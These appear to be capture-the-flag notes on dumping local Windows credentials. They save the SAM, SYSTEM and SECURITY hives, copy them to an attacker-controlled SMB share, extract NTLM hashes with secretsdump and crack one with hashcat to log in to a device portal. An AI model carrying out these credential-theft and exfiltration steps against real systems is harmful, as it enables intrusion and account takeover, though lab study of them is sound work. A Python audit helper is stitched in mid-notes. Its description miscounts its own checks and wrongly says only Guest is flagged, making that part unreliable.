4 dump SAM SYSTEM

c:\inetput\wwwwroot>fgdump.exe
This version of c:\inetput\wwwwroot\fgdump.exe is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher.

Using https://www.hackingarticles.in/credential-dumping-sam/

# tried PwDump7
# tried wce.exe

# trying SamDump2
c:\inetput\wwwwroot>reg save hklm\sam C:\inetput\wwwwroot\sam
reg save hklm\sam C:\inetput\wwwwroot\sam
The operation completed successfully.

c:\inetput\wwwwroot>reg save hklm\system C:\inetput\wwwwroot\system
reg save hklm\system C:\inetput\wwwwroot\system
The operation completed successfully

c:\inetput\wwwwroot>reg save hklm\security C:\inetput\wwwwroot\security
reg save hklm\security C:\inetput\wwwwroot\security
The operation completed successfully.

# moving files to kali
c:\inetput\wwwwroot>copy sam \\10.10.16.7\drive\
copy sam \\10.10.16.7\drive\
You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747
        0 file(s) copied.

# $ smbserver.py -smb2support drive .
c:\inetput\wwwwroot>copy sam \\10.10.16.7\drive\
copy sam \\10.10.16.7\drive\
        1 file(s) copied.

c:\inetput\wwwwroot>copy system \\10.10.16.7\drive\
copy system \\10.10.16.7\drive\
        1 file(s) copied.

c:\inetput\wwwwroot>copy security \\10.10.16.7\drive\
copy security \\10.10.16.7\drive\
        1 file(s) copied.

$ file sam system
sam:    MS Windows registry file, NT/2000 or above
system: MS Windows registry file, NT/2000 or above

$ samdump2 system sam
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

# samdump2 output above is not usable: usernames are blank and every NT hash is 31d6cfe0d16ae931b73c59d7e0c089c0 (the empty-password hash),
# which is what an older samdump2 produces when it cannot decrypt the AES-encrypted SAM format of newer Windows builds
[OR]
$ secretsdump.py -sam sam -security security -system system LOCAL
Impacket v0.9.24.dev1+20210917.161743.0297480b - Copyright 2021 SecureAuth Corporation

[*] Target system bootKey: 0x4a96b0f404fd37b862c07c2aa37853a5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:330fe4fd406f9d0180d67adb0b0dfa65:::
sshd:1000:aad3b435b51404eeaad3b435b51404ee:91ad590862916cdfd922475caed3acea:::
DevToolsUser:1002:aad3b435b51404eeaad3b435b51404ee:1b9ce6c5783785717e9bbb75ba5f9958:::
app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::
[*] Cleaning up...
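
A small audit helper for dumps in the `user:rid:lmhash:nthash:::` format shown above. This is an added example, not part of the original notes or of Impacket/samdump2; it parses both secretsdump and samdump2 style lines and flags the three things worth checking before trusting a dump: an all-empty-NT-hash result like the samdump2 run above (undecrypted SAM), blank usernames, enabled accounts with the empty-password NT hash, and non-empty LM hashes (legacy LM storage). The sample text is constructed from values on this page.

```python
import re

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

# pwdump line: [*disabled* ]user:rid:lmhash:nthash:::  (user may be blank)
LINE_RE = re.compile(
    r"^(?P<flags>(?:\*\w+\*\s*)*)(?P<user>[^:]*):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$")


def parse_dump(text):
    """Return one dict per hash line; banner lines such as "[*] ..." are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            entries.append({"user": m["user"].strip(), "rid": int(m["rid"]),
                            "lm": m["lm"].lower(), "nt": m["nt"].lower(),
                            "disabled": "*disabled*" in m["flags"].lower()})
    return entries


def audit(entries):
    """Return (finding, subject) pairs in dump order."""
    findings = []
    if entries and all(e["nt"] == EMPTY_NT for e in entries):
        # Every account carrying the empty-password hash is not a real result:
        # it is what an old samdump2 emits when it cannot decrypt the SAM.
        findings.append(("UNDECRYPTED_DUMP", "all accounts"))
    for e in entries:
        subject = e["user"] or f"RID {e['rid']}"
        if not e["user"]:
            findings.append(("MISSING_USERNAME", subject))
        if e["lm"] != EMPTY_LM:
            findings.append(("LM_HASH_STORED", subject))  # legacy LM storage on
        if e["nt"] == EMPTY_NT and not e["disabled"]:
            # secretsdump does not print account state, so this may be a
            # disabled built-in (e.g. Guest) rather than a blank password.
            findings.append(("EMPTY_PASSWORD_OR_UNRESOLVED", subject))
    return findings


# Constructed sample in the secretsdump format above (values from this page).
SECRETSDUMP_SAMPLE = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::
[*] Cleaning up...
"""
```

Running `audit(parse_dump(open("dump.txt").read()))` over the samdump2 output above yields `UNDECRYPTED_DUMP` plus `MISSING_USERNAME` entries, while the secretsdump output only flags Guest.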

# cracked app
e3cb0651718ee9b4faffe19a51faff95	NTLM	mesh5143

$ hashcat -m 1000 hash /usr/share/wordlists/rockyou.txt --show
31d6cfe0d16ae931b73c59d7e0c089c0:
e3cb0651718ee9b4faffe19a51faff95:mesh5143

# using app:mesh5143 we can log in to Windows Device Portal
http://10.10.10.204:8080/#Device%20Settings
# Device Portal reports OS version 10.0.17763.107
